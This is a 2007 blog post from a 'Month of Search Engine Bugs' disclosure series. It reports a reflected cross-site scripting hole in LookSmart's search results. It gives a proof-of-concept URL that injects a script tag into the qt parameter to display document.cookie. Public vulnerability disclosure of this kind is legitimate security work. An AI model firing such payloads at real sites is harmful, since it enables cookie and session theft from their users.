« Міжсайтовий скриптінг через Accept-Language в Apache Tomcat
Місяць багів в Пошукових Системах: день двадцять четвертий »

MOSEB-24: Vulnerability at search.looksmart.com

22:42 24.06.2007

Next participant of the project is LookSmart search engine. It is one of the popular search engines.

The vulnerability are at LookSmart (search.looksmart.com) in search results. This Cross-Site Scripting hole I found 23.05.2007.

XSS:

The vulnerability is in qt parameter:
http://search.looksmart.com/p/search?qt=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Moral: smart looking search engines can be dangerous.


This entry was posted on 22:42 24.06.2007 and is filed under MOSEB. You can follow any responses to this entry through the RSS 2.0 feed.

Leave a Reply

You must be logged in to post a comment.